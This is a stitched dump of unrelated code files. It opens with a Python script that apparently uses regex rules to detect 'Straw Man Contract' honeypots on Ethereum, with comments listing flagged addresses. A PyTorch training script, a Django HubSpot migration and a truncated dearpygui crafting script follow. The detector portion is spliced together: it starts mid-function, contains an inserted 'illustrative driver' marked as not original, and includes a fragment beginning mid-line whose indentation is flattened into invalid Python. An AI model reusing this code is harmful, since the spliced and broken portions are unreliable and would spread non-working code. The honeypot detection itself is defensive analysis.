with_comment_re = re.findall(pattern_with_comment, vcode, flags=0)\r\n    for i in with_comment_re:\r\n        vcode = vcode.replace(i, '')\r\n\r\n    # SafeMath_re = re.findall(pattern_exclude_1, vcode, flags=0)\r\n    # # print(SafeMath_re)\r\n    # # actually, we should also\r\n    # SafeMath_exist = False\r\n    # if (SafeMath_re != []):\r\n    #     for i in SafeMath_re:\r\n    #         if i[0] == '':\r\n    #             SafeMath_exist = True\r\n    #             break\r\n    # if SafeMath_exist == True:\r\n    #     # continue\r\n    #     return 0\r\n\r\n    if rows_len > 150:\r\n        SafeMath_re = re.findall(pattern_exclude_1, vcode, flags=0)\r\n        # print(SafeMath_re)\r\n        # actually, we should also\r\n        SafeMath_exist = False\r\n        if (SafeMath_re != []):\r\n            for i in SafeMath_re:\r\n                if i[0] == '':\r\n                    SafeMath_exist = True\r\n                    break\r\n        if SafeMath_exist == True:\r\n            # continue\r\n            return 0\r\n\r\n    Interface_re = re.findall(pattern_exclude_noInterface, vcode, flags=0)\r\n    # print(hp, \"&&&&&&&&&&&&&&\",Interface_re)\r\n    if Interface_re != []:\r\n        # continue\r\n        return 0\r\n\r\n    # # token-2 is not very rigorous; if it hurts detection later, consider deleting it. Its purpose here is purely to rule out complex logic\r\n    # token_re_2 = re.findall(pattern_exclude_noToken_2, vcode, flags=0)\r\n    # # print(len(token_re))\r\n    # # print(token_re)\r\n    # if (token_re_1 != []) and (token_re_2 != []):\r\n    #     # continue\r\n    #     return 0\r\n\r\n    list_compiler = re.findall(pattern_compiler, vcode, flags=0)\r\n    if len(list_compiler) != 0:\r\n        minor_version = int(list_compiler[0].split('.')[1])\r\n        patch_version = int(list_compiler[0].split('.')[2])\r\n        minor_patch_v = minor_version * 100 + patch_version\r\n        if minor_patch_v >= 400:\r\n            payable_re_list = re.findall(pattern_exclude_noPayable, vcode, flags=0)\r\n            if payable_re_list == []:\r\n                # continue\r\n                return 0\r\n\r\n    return vcode\r\n\r\ndef SMC_deal(hp, vcode):\r\n    is_SMC_hp = False\r\n\r\n    transfer_1_list = re.findall(pattern_4_transfer_1, vcode, flags=0)\r\n    send_2_list = re.findall(pattern_4_send_2, vcode, flags=0)\r\n    call_3_list = re.findall(pattern_4_call_3, vcode, flags=0)\r\n    if ((len(transfer_1_list) == 0) and (len(send_2_list) == 0) and (len(call_3_list) == 0)):\r\n        return is_SMC_hp\r\n\r\n    # 1. Get the contract name(s)\r\n    contractName_set = set()\r\n    contractName_list_temp = re.findall(pattern_contractName, vcode, flags=0)\r\n    for contractName in contractName_list_temp:\r\n        if contractName[0] != '':\r\n            continue\r\n        _contract_name = contractName[1].split('{')[0].strip()\r\n        contractName_set.add(_contract_name)\r\n    # print(contractName_set,'**********')\r\n\r\n    # When there are at least 2 contracts, run the constructor-type and onlyOwner-type detection\r\n    first_two_detect_isOver = False\r\n    if len(contractName_set) >= 2:\r\n        # 2. Split out the functions (modifiers not considered)\r\n        function_code_list = function_or_modifier_split(vcode, 'function') #2-tuple List\r\n        function_code_list_need = function_or_modifier_split(vcode, 'constructor(') #2-tuple List\r\n        function_code_list_modifier = function_or_modifier_split(vcode, 'modifier ') #2-tuple List\r\n        # Re-prepend the ( to the results split on constructor(\r\n        function_code_list_need = [('('+each_fNeed[0],each_fNeed[1]) for each_fNeed in function_code_list_need]\r\n\r\n        # 2-1. Global code\r\n        global_var_code = vcode\r\n        for function_code in function_code_list:\r\n            global_var_code = global_var_code.replace(function_code[0] + function_code[1], '')\r\n        for function_code_need in function_code_list_need:\r\n            global_var_code = global_var_code.replace(function_code_need[0] + function_code_need[1], '')\r\n        for function_code_mf in function_code_list_modifier:\r\n            global_var_code = global_var_code.replace(function_code_mf[0] + function_code_mf[1], '')\r\n        # print(global_var_code,\"WWWWWWW\")\r\n        # 2-2. Check the global code for contract instance declarations\r\n        for each_cN in contractName_set:\r\n            pattern_cN_init = re.compile(r'(.*)(' + each_cN + r'\\s+.*);')\r\n            cN_init_result = re.findall(pattern_cN_init, global_var_code, flags=0)\r\n            cN_init_name_set = set()\r\n            for each_cN_init in cN_init_result:\r\n                if (each_cN_init[0] != '') and (each_cN_init[0][-1] != ' ') and \\\r\n                        (each_cN_init[0][-1] != '\\n') and (each_cN_init[0][-1] != '\\t'):\r\n                    continue\r\n                # Get the name used in the contract instance declaration\r\n                cN_init_name_set.add(each_cN_init[1].split('=')[0].strip())\r\n            # There must be a global declaration\r\n            if cN_init_name_set == set():\r\n                first_two_detect_isOver = True # means it is definitely neither constructor type nor onlyOwner type, but delegatecall has not been checked yet\r\n\r\n        if first_two_detect_isOver == False:\r\n            # 3. Constructors and onlyOwner-restricted functions - keep only these two kinds of functions\r\n            for each_func_2_tuple in function_code_list:\r\n                # Function with the same name as the contract - a constructor\r\n                for each_contract_name in contractName_set:\r\n                    if (each_func_2_tuple[0].split('(')[0].strip() == each_contract_name):\r\n                        function_code_list_need.append(each_func_2_tuple)\r\n                # onlyOwner-restricted function\r\n                if 'onlyOwner' in each_func_2_tuple[0]:\r\n                    function_code_list_need.append(each_func_2_tuple)\r\n            # print(function_code_list_need)\r\n            # 4. For each function, check whether a parameter is used to instantiate the contract\r\n            for func_need_2_tuple in function_code_list_need:\r\n                # Collect the function's address-typed parameters\r\n                func_addr_para_set = set()\r\n                para_content = func_need_2_tuple[0].split('(')[1].split(')')[0]\r\n                # Split out each parameter\r\n                para_list = para_content.split(',')\r\n                for each_para in para_list:\r\n                    if 'address ' in each_para:\r\n                        func_addr_para_set.add(each_para.split()[-1])\r\n                if func_addr_para_set == set():\r\n                    continue\r\n                # Check the function body for instantiation of the declared contract\r\n                for cN_init_str in cN_init_name_set:\r\n                    # 001. Split\r\n                    cN_init_str_list = cN_init_str.split()\r\n                    if len(cN_init_str_list) < 2:\r\n                        continue\r\n                    # 002. Template - capture the address used for instantiation; it must intersect the parameter set\r\n                    if (\")\" in cN_init_str_list[-1]) or (\"(\" in cN_init_str_list[-1]):\r\n                        continue\r\n                    cN_instance_template = re.compile(cN_init_str_list[-1] + '\\s*=\\s*' + cN_init_str_list[0] + '[(](.*)[)]')\r\n                    cN_instance_result = re.findall(cN_instance_template, func_need_2_tuple[1], flags=0)\r\n                    if len(cN_instance_result) != 1:\r\n                        continue\r\n                    # If it is non-empty, there can be only one argument, i.e. the list length is 1:\r\n                    if cN_instance_result[0] in func_addr_para_set:\r\n                        print(hp, ' has a high possibility to be a SMC hp (constructor or onlyOwner type).')\r\n                        is_SMC_hp = True\r\n                        return is_SMC_hp\r\n\r\n    # if hp == r'0xa91a453abde404a303fb118c46e00c8f630216a9':\r\n    delegatecall_1_list = re.findall(pattern_3_delegatecall_1, vcode, flags=0)\r\n    # transfer_1_list = re.findall(pattern_4_transfer_1, vcode, flags=0)\r\n    # send_2_list = re.findall(pattern_4_send_2, vcode, flags=0)\r\n    # call_3_list = re.findall(pattern_4_call_3, vcode, flags=0)\r\n    if (len(delegatecall_1_list) != 0): #and \\\r\n        # ((len(transfer_1_list) != 0) or (len(send_2_list) != 0) or (len(call_3_list) != 0)):\r\n        print(hp, ' has a high possibility to be a SMC hp (delegatecall type).')\r\n        is_SMC_hp = True\r\n        return is_SMC_hp\r\n\r\n    return is_SMC_hp\r\n\r\n\r\n
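# Illustrative driver (an assumption, not in the original script): how common_deal\r\n# and SMC_deal compose for one in-memory contract source; addr and src are placeholders.\r\ndef _detect_one(addr, src):\r\n    cleaned = common_deal(addr, src)\r\n    if cleaned == 0:\r\n        return False # filtered out: complex logic, SafeMath, an interface, or no payable\r\n    return SMC_deal(addr, cleaned)\r\n\r\n\r\n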
re.compile(r\"/[*]([\\s\\S]*?)[*]/\")\r\n multiLine_comments = re.findall(patterrn_multiLine_comment, vcode, flags=0)\r\n # print(multiLine_comments)\r\n for multiLine in multiLine_comments:\r\n vcode = vcode.replace(multiLine, '')\r\n\r\n rows_list = vcode.split('\\n')\r\n rows_len = len(rows_list)\r\n # print(rows_list)\r\n # print(len(rows_list))\r\n for i in rows_list:\r\n i = i.strip()\r\n # if (i == '') or (i[:2] == '//') or (i[:4] == '/**/'):\r\n if (len(i) > 2) and ((i[:2] == '//') or (i[:4] == '/**/')):\r\n vcode = vcode.replace(i, '')\r\n rows_len -= 1\r\n # print(vcode)\r\n # print(rows_len) #排除注释后的行数\r\n # if rows_len > max:\r\n # max = rows_len\r\n # if rows_len < min:\r\n # min = rows_len\r\n # print(min, max)\r\n # 用超于当前蜜罐最大有效行数的三倍去定义复杂逻辑, 超过就等价于复杂逻辑, 对新手黑客不具有吸引力。\r\n if rows_len > 450:\r\n continue\r\n\r\n SafeMath_re = re.findall(pattern_exclude_1, vcode, flags=0)\r\n # print(SafeMath_re)\r\n # 其实, 还应该\r\n SafeMath_exist = False\r\n if (SafeMath_re != []):\r\n for i in SafeMath_re:\r\n if i[0] == '':\r\n SafeMath_exist = True\r\n break\r\n if SafeMath_exist == True:\r\n continue\r\n\r\n Interface_re = re.findall(pattern_exclude_noInterface, vcode, flags=0)\r\n # print(hp, \"&&&&&&&&&&&&&&\",Interface_re)\r\n if Interface_re != []:\r\n continue\r\n\r\n payable_re_list = re.findall(pattern_exclude_noPayable, vcode, flags=0)\r\n if payable_re_list == []:\r\n continue\r\n\r\n contractName_list = re.findall(pattern_contractName, vcode, flags=0)\r\n constructor_list_1 = []\r\n for contractName in contractName_list:\r\n if contractName[0] != '':\r\n continue\r\n pattern_2_constructor_1 = re.compile(r'function ' + contractName[1].strip() + '([ ]*)[(](.*)address (.*)[)]')\r\n constructor_list_1 += re.findall(pattern_2_constructor_1, vcode, flags=0)\r\n constructor_list_2 = re.findall(pattern_2_constructor_2, vcode, flags=0)\r\n if (len(constructor_list_1) != 0) or (len(constructor_list_2) != 0):\r\n print(hp, ' has a high possibility to be a SMC hp (constructor type).')\r\n\r\n constructor_list_3 = re.findall(pattern_2_function_onlyOwner_3, vcode, flags=0)\r\n if (len(constructor_list_3) != 0):\r\n for list_i in range(len(constructor_list_3)):\r\n addr_name = constructor_list_3[list_i][2]\r\n pattern_2_function_onlyOwner_addrName = re.compile(r'(.*)=(.*)[(]'+addr_name+'[)];')\r\n if (len(re.findall(pattern_2_function_onlyOwner_addrName, vcode, flags=0))!=0):\r\n print(hp, ' has a high possibility to be a SMC hp (function_onlyOwner type).')\r\n break\r\n\r\n\r\n # if hp == r'0xa91a453abde404a303fb118c46e00c8f630216a9':\r\n delegatecall_1_list = re.findall(pattern_3_delegatecall_1, vcode, flags=0)\r\n transfer_1_list = re.findall(pattern_4_transfer_1, vcode, flags=0)\r\n send_2_list = re.findall(pattern_4_send_2, vcode, flags=0)\r\n call_3_list = re.findall(pattern_4_call_3, vcode, flags=0)\r\n if (len(delegatecall_1_list) != 0) and \\\r\n ((len(transfer_1_list) != 0) or (len(send_2_list) != 0) or (len(call_3_list) != 0)):\r\n print(hp, ' has a high possibility to be a SMC hp (delegatecall type).')\r\n\r\n # break\r\n\r\nif __name__ == '__main__':\r\n # hp_8type_path = r'E:\\PyCharm_workspace\\book_deeplearning\\smart-contract\\honeypots_all8tyes_truePositive.json'\r\n # hp_8type_path = r'E:\\PyCharm_workspace\\book_deeplearning\\smart-contract\\honeypots_more13_FromXGBootst_truePositive.json'\r\n # hp_8type_path = r'E:\\PyCharm_workspace\\book_deeplearning\\smart-contract\\honeypots_all8tyes_FalsePositive.json'\r\n # hp_dict = load_json(hp_8type_path)\r\n\r\n # paper_new_hp_path = 
r'E:\\PyCharm_workspace\\book_deeplearning\\smart-contract\\honeypots_paper_new_addr2SouceCode.json'\r\n # hp_dict = load_json(paper_new_hp_path)\r\n for hp, vcode in hp_dict.items():\r\n # print(hp)\r\n # if hp == r'0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4':\r\n\r\n vcode = common_deal(hp, vcode)\r\n if vcode == 0:\r\n continue\r\n\r\n SMC_deal(hp, vcode)\r\n\r\n\r\n'''\r\n# honeypots_all8tyes_truePositive.json 除HSU式的SMC蜜罐(见HSU检测脚本), 当前结果为0误报、0漏报\r\n0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4 has a high possibility to be a SMC hp (constructor type). √\r\n0x23f890c412f3f06784a30ba40ed4832a0fca55f0 has a high possibility to be a SMC hp (delegatecall type). √\r\n0x463f235748bc7862deaa04d85b4b16ac8fafef39 has a high possibility to be a SMC hp (constructor type). √\r\n0x477d1ee2f953a2f85dbecbcb371c2613809ea452 has a high possibility to be a SMC hp (delegatecall type). √\r\n0x62d5c4a317b93085697cfb1c775be4398df0678c has a high possibility to be a SMC hp (delegatecall type). √\r\n0x7a7d08bcb2faf27414e86ecf9a0351d928054b6b has a high possibility to be a SMC hp (delegatecall type). √\r\n0x7a8721a9d64c74da899424c1b52acbf58ddc9782 has a high possibility to be a SMC hp (function_onlyOwner type). √\r\n0x8c7777c45481dba411450c228cb692ac3d550344 has a high possibility to be a SMC hp (constructor type). √\r\n0x941d225236464a25eb18076df7da6a91d0f95e9e has a high possibility to be a SMC hp (constructor type). √\r\n0x95d34980095380851902ccd9a1fb4c813c2cb639 has a high possibility to be a SMC hp (constructor type). √\r\n0xa5d6accc5695327f65cbf38da29198df53efdcf0 has a high possibility to be a SMC hp (constructor type). √\r\n0xa91a453abde404a303fb118c46e00c8f630216a9 has a high possibility to be a SMC hp (delegatecall type). √\r\n0xb4c05e6e4cdb07c15095300d96a5735046eef999 has a high possibility to be a SMC hp (constructor type). √\r\n0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12 has a high possibility to be a SMC hp (constructor type). √\r\n0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e has a high possibility to be a SMC hp (constructor type). √\r\n0xbabfe0ae175b847543724c386700065137d30e3b has a high possibility to be a SMC hp (constructor type). √\r\n0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f has a high possibility to be a SMC hp (constructor type). √\r\n0xd116d1349c1382b0b302086a4e4219ae4f8634ff has a high possibility to be a SMC hp (constructor type). √\r\n0xdad02644b70cbb20dec56d25282ddc65bb7805a1 has a high possibility to be a SMC hp (delegatecall type). √\r\n0xe610af01f92f19679327715b426c35849c47c657 has a high possibility to be a SMC hp (constructor type). √\r\n0xfa8bb2a68c67e39409cd336d1a8024a2ad9a62ff has a high possibility to be a SMC hp (delegatecall type). √\r\n0xff5a11c0442028ee2a60d31e6ebb3cbac121ffe5 has a high possibility to be a SMC hp (delegatecall type). √\r\n'''\r\n\r\n'''\r\nhoneypots_all8tyes_FalsePositive.json -- 理论上就是无\r\n无\r\n'''\r\n\r\n'''\r\nhoneypots_more13_FromXGBootst_truePositive.json\r\n0x65e5909d665cbda128de96aa9eb0160729eac1b0 has a high possibility to be a SMC hp (constructor type). 
√\r\n'''\r\n\r\n'''\r\n# honeypots_paper_new_addr2SouceCode.json 通过HSU脚本检测到\r\n0x85179ac15aa94e3ca32dd1cc04664e9bb0062115 has a high possibility to be a SMC (depended on HSU) hp.\r\n0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b has a high possibility to be a SMC (depended on HSU) hp.\r\n------漏报--- 消除漏报的方法很简单, 只需要在当前SMC的检测脚本中将对转账指令的判断至于delegatecall绑定即可, 但这里在分析之后, 我认为时XGBoost他们的误报, 攻击者看不到明确的获利入口, 这样是无法吸引新手黑客的。\r\n0xa6c76471cc89cff4e65cc1fc36613f3c31e4d0d1,Straw Man Contract (SMC)\r\n0xd754ee6a9e8964602f48e11971e79d0b2f6452d5,Straw Man Contract (SMC)\r\n0x2f846758e479ee7e0bd87cea5b9f8f3e314c6bd9,Straw Man Contract (SMC)\r\n'''\r\n\r\n\r\n","repo_name":"yogaJtt/CADetector","sub_path":"CADetector实验代码/hp_SMC_sourceCode_detect.py","file_name":"hp_SMC_sourceCode_detect.py","file_ext":"py","file_size_in_byte":24088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"1896190226","text":"import torch\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\nimport numpy as np\n\nimport segmentation_dataset as dataset\nimport segmentation_model\nimport segmentation_training as training\n\n\nif __name__ == \"__main__\":\n\n torch.manual_seed(0)\n\n # epochs = 20\n epochs = 7\n\n SPLIT_FILE = \"../KolektorSDD-training-splits/split.pyb\"\n ROOT_DIR = \"../KolektorSDD\"\n MODEL_PATH = \"model_{}epochs.pth\".format(epochs)\n LOSSES_PATH = \"losses_{}epochs.npy\".format(epochs)\n\n image_size = (1408 // 2, 512 // 2)\n channels = 1\n height, width = image_size\n learning_rate = 1e-2\n\n datasetTrain = dataset.SegmentationDatasetTrain(SPLIT_FILE, ROOT_DIR,\n image_size=image_size)\n average_image = datasetTrain.get_average_image()\n dataLoaderTrain = DataLoader(datasetTrain, shuffle=True)\n\n datasetVal = dataset.SegmentationDatasetVal(SPLIT_FILE, ROOT_DIR,\n image_size=image_size,\n average_image=average_image)\n dataLoaderVal = DataLoader(datasetVal)\n\n model = segmentation_model.SegmentationNet(channels, height, width)\n optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n losses = training.train(dataLoaderTrain, dataLoaderVal, model, optimizer,\n epochs=epochs)\n\n torch.save(model.state_dict(), MODEL_PATH)\n np.save(LOSSES_PATH, losses)\n","repo_name":"sarastra/kolektor","sub_path":"segmentation/segmentation_training_script.py","file_name":"segmentation_training_script.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43010838862","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport dirtyfields.dirtyfields\nimport django_extensions.db.fields\nfrom decimal import Decimal\nimport core.fields\nimport djmoney.models.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('revenues', '0006_auto_20160111_1529'),\n ('performance', '0008_auto_20160114_1957'),\n ('leads', '0003_program_contacts_to_mql_conversion'),\n ('companies', '0005_auto_20151207_1749'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='HubspotCampaignToICMOCampaign',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n ),\n migrations.CreateModel(\n name='HubspotCompany',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('hs_company_id', models.CharField(max_length=255)),\n ('name', models.CharField(max_length=1024)),\n 
('annualrevenue', models.IntegerField(null=True, blank=True)),\n ('industry', models.CharField(max_length=255, blank=True)),\n ('state', models.CharField(max_length=255, blank=True)),\n ('city', models.CharField(max_length=255, blank=True)),\n ('country', models.CharField(max_length=255, blank=True)),\n ('company', models.ForeignKey(to='companies.Company')),\n ],\n ),\n migrations.CreateModel(\n name='HubspotConnection',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),\n ('hub_id', models.CharField(help_text=b'Log into HubSpot to find your Hub ID in the upper righthand corner of the HubSpot application.', max_length=255)),\n ('access_token', models.CharField(max_length=255)),\n ('expires_at', models.DateTimeField(null=True)),\n ('refresh_token', models.CharField(max_length=255)),\n ('last_sync', models.DateTimeField(auto_now=True, null=True)),\n ('contacts_last_modified_date', models.DateTimeField(null=True, blank=True)),\n ('company', models.OneToOneField(to='companies.Company')),\n ],\n options={\n 'ordering': ('-modified', '-created'),\n 'abstract': False,\n 'get_latest_by': 'modified',\n },\n ),\n migrations.CreateModel(\n name='HubspotContact',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('vid', models.PositiveIntegerField()),\n ('associatedcompanyid', models.CharField(max_length=255, blank=True)),\n ('current_lifecyclestage', models.CharField(max_length=255)),\n ('hs_analytics_first_url', models.URLField(max_length=2048)),\n ('hs_analytics_source', models.CharField(max_length=255)),\n ('hs_analytics_source_data_1', models.CharField(max_length=2048)),\n ('hs_analytics_source_data_2', models.CharField(max_length=2048)),\n ('industry', models.CharField(max_length=255)),\n ('annualrevenue', models.PositiveIntegerField(null=True, blank=True)),\n ('campaign_name_guess', models.CharField(default=b'Unknown', max_length=255)),\n ('campaign_name_slug', models.CharField(max_length=255)),\n ('remote_timestamp', models.DateTimeField(null=True)),\n ('company', models.ForeignKey(to='companies.Company')),\n ('connection', models.ForeignKey(related_name='contacts', to='hubspot_icmo.HubspotConnection')),\n ],\n ),\n migrations.CreateModel(\n name='HubspotContactEvent',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('event_date', models.DateTimeField()),\n ('event_stage', models.CharField(max_length=50, choices=[(b'subscriber', b'Subscriber'), (b'lead', b'Lead'), (b'marketingqualifiedlead', b'Marketingqualifiedlead'), (b'salesqualifiedlead', b'Salesqualifiedlead'), (b'opportunity', b'Opportunity'), (b'customer', b'Customer')])),\n ('company', models.ForeignKey(to='companies.Company')),\n ('connection', models.ForeignKey(related_name='events', to='hubspot_icmo.HubspotConnection')),\n ('contact', models.ForeignKey(related_name='events', to='hubspot_icmo.HubspotContact')),\n ],\n ),\n migrations.CreateModel(\n name='HubspotDeal',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('deal_id', models.CharField(max_length=255)),\n ('contact_vid', models.CharField(max_length=255, blank=True)),\n ('hs_company_id', 
models.CharField(max_length=255, blank=True)),\n ('dealname', models.CharField(max_length=255)),\n ('amount_currency', djmoney.models.fields.CurrencyField(default=b'USD', max_length=3, editable=False, choices=[(b'USD', 'US Dollar')])),\n ('amount', core.fields.DefaultMoneyField(default=Decimal('0'), max_digits=10, decimal_places=2)),\n ('dealstage', models.CharField(max_length=255)),\n ('dealstage_last_modified', models.DateTimeField()),\n ('closedwon_date', models.DateTimeField(null=True, blank=True)),\n ('company', models.ForeignKey(to='companies.Company')),\n ('connection', models.ForeignKey(related_name='deals', to='hubspot_icmo.HubspotConnection')),\n ('contact', models.ForeignKey(blank=True, to='hubspot_icmo.HubspotContact', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='HubspotRevenuePlan',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),\n ('segment_mapping_field', models.CharField(default=b'industry', max_length=255, choices=[(b'industry', b'Company Industry'), (b'annualrevenue', b'Company Annual Revenue')])),\n ('connection', models.ForeignKey(related_name='connected_plans', to='hubspot_icmo.HubspotConnection')),\n ('revenue_plan', models.OneToOneField(to='revenues.RevenuePlan')),\n ],\n options={\n 'ordering': ('-modified', '-created'),\n 'abstract': False,\n 'get_latest_by': 'modified',\n },\n bases=(dirtyfields.dirtyfields.DirtyFieldsMixin, models.Model),\n ),\n migrations.CreateModel(\n name='HubspotRevenuePlanCampaign',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('slug', models.CharField(max_length=255)),\n ('hubspot_revenue_plan', models.ForeignKey(to='hubspot_icmo.HubspotRevenuePlan')),\n ('programs', models.ManyToManyField(to='leads.Program')),\n ('revenue_plan', models.ForeignKey(to='revenues.RevenuePlan')),\n ],\n options={\n 'ordering': ('name',),\n },\n ),\n migrations.CreateModel(\n name='HubspotRevenuePlanCampaignMonthPerformance',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),\n ('month', models.PositiveSmallIntegerField()),\n ('contacts', models.PositiveSmallIntegerField(default=0)),\n ('mql', models.PositiveSmallIntegerField(default=0)),\n ('sql', models.PositiveSmallIntegerField(default=0)),\n ('sales', models.PositiveSmallIntegerField(default=0)),\n ('sales_revenue_currency', djmoney.models.fields.CurrencyField(default=b'USD', max_length=3, editable=False, choices=[(b'USD', 'US Dollar')])),\n ('sales_revenue', core.fields.DefaultMoneyField(default=Decimal('0'), max_digits=10, decimal_places=0)),\n ('connection', models.ForeignKey(to='hubspot_icmo.HubspotConnection')),\n ('hubspot_revenue_plan', models.ForeignKey(to='hubspot_icmo.HubspotRevenuePlan')),\n ('hubspot_revenue_plan_campaign', models.ForeignKey(to='hubspot_icmo.HubspotRevenuePlanCampaign')),\n ('segment', models.ForeignKey(to='revenues.Segment')),\n ],\n options={\n 'ordering': ('hubspot_revenue_plan_campaign', 
'month'),\n },\n ),\n migrations.CreateModel(\n name='HubspotRevenuePlanSegmentMap',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('mapping_field', models.CharField(max_length=255, choices=[(b'industry', b'Company Industry'), (b'annualrevenue', b'Company Annual Revenue')])),\n ('hs_value_1', models.CharField(max_length=255, blank=True)),\n ('hs_value_2', models.CharField(max_length=255, blank=True)),\n ('hubspot_revenue_plan', models.ForeignKey(related_name='segment_map', to='hubspot_icmo.HubspotRevenuePlan')),\n ('revenue_plan', models.ForeignKey(to='revenues.RevenuePlan')),\n ('segment', models.ForeignKey(blank=True, to='revenues.Segment', null=True)),\n ],\n options={\n 'ordering': ('hs_value_1',),\n },\n ),\n migrations.AddField(\n model_name='hubspotcompany',\n name='connection',\n field=models.ForeignKey(related_name='hs_companies', to='hubspot_icmo.HubspotConnection'),\n ),\n migrations.AddField(\n model_name='hubspotcampaigntoicmocampaign',\n name='hubspot_campaign',\n field=models.ForeignKey(related_name='icmo_campaigns', to='hubspot_icmo.HubspotRevenuePlanCampaign'),\n ),\n migrations.AddField(\n model_name='hubspotcampaigntoicmocampaign',\n name='icmo_campaign',\n field=models.ForeignKey(related_name='hubspot_campaigns', to='performance.Campaign'),\n ),\n ]\n","repo_name":"hasanulhaquebanna/testing-gregg","sub_path":"icmo/apps/hubspot_icmo/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":11444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28814904558","text":"import dearpygui.dearpygui as dpg\r\nimport time\r\n\r\ndpg.create_context()\r\n\r\nclass floatvar:\r\n def __init__(self, tag, value=0.0):\r\n self.tag = tag\r\n self.value = value\r\n def set(self, value):\r\n self.value = value\r\n dpg.set_value(self.tag, self.value)\r\n def get(self):\r\n return self.value\r\n\r\nclass listvar:\r\n def __init__(self, tag):\r\n self.tag = tag\r\n self.value = dpg.get_value(self.tag)\r\n def set(self, value):\r\n self.value = sorted(value)\r\n dpg.configure_item(self.tag, items=self.value)\r\n def get(self):\r\n return dpg.get_value(self.tag)\r\n\r\nclass ITEM:\r\n def __init__(self, ID, NAME, primary=False):\r\n self.ID = ID\r\n self.NAME = NAME\r\n self.primary = primary\r\n def __getitem__(self, key):\r\n return [self.ID, self.NAME][key]\r\n def __repr__(self):\r\n return f\"|ITEM: {self.ID} {self.NAME}|\"\r\n\r\nclass STRUCTURE(ITEM):\r\n def __repr__(self):\r\n return f\"|STRUCTURE: {self.ID} {self.NAME}|\"\r\n\r\nclass CRAFT:\r\n def __init__(self, id, row):\r\n self.ID =id\r\n self.IDstr = row[0]\r\n self.IImp = (row[1], row[2], row[3], row[4])\r\n self.SImp = (row[5], row[6], row[7], row[8])\r\n self.SExp = row[9]\r\n self.IExp = row[10]\r\n def __repr__(self):\r\n return f\"|Craft: {self.ID} {self.IDstr} {self.IImp} {self.SImp} {self.SExp} {self.IExp}|\"\r\n\r\nclass TreeNode:\r\n def __init__(self, item, structure, veight, veight_i, level=0, father=None):\r\n self.id = countplus()\r\n self.item = item\r\n self.structure = structure\r\n self.veight = veight\r\n self.veight_i = veight_i\r\n self.depend = []\r\n self.level = level\r\n self.father = father\r\n self.x, self.y = 0, self.level*400+30\r\n def append(self, item, structure, veight, veight_i, level=0):\r\n self.depend.append(TreeNode(item, structure, veight, veight_i, level, self.id))\r\n def print(self):\r\n global TEMPID\r\n if not(self.item in 
TEMPID):\r\n TEMPID.append(self.item)\r\n if not(self.structure in TEMPID) and self.structure!=None:\r\n TEMPID.append(self.structure)\r\n\r\nclass BinaryTree:\r\n def __init__(self, get):\r\n id_item = sITEMS[get]\r\n craft__ = CRAFTS[sCRAFTS[id_item]]\r\n self.level = 0\r\n self.b_tree = TreeNode(id_item, craft__.IDstr, craft__.SExp, craft__.SImp, self.level)\r\n for ix, i in enumerate(craft__.IImp):\r\n if i !=None:\r\n if not (i in sCRAFTS):\r\n stru = None\r\n veight = None\r\n veight_i = (None, None, None, None)\r\n self.b_tree.append(i, stru, veight, veight_i, self.level + 1)\r\n else:\r\n craft_ = CRAFTS[sCRAFTS[i]]\r\n stru = craft_.IDstr\r\n veight = craft_.SExp\r\n veight_i = craft_.SImp\r\n self.b_tree.append(i, stru, veight, veight_i, self.level+1)\r\n self.aappend(i, self.b_tree.depend[ix], self.level+1)\r\n return\r\n def aappend(self,id_item, tree, level):\r\n craft_ = CRAFTS[sCRAFTS[id_item]]\r\n for ix, i in enumerate(craft_.IImp):\r\n if i !=None:\r\n if not (i in sCRAFTS):\r\n stru = None\r\n veight_e = None\r\n veight_i = (None, None, None, None)\r\n tree.append(i, stru, veight_e, veight_i, level + 1)\r\n else:\r\n craft = CRAFTS[sCRAFTS[i]]\r\n stru = craft.IDstr\r\n veight_e = craft.SExp\r\n veight_i = craft.SImp\r\n tree.append(i, stru, veight_e, veight_i, 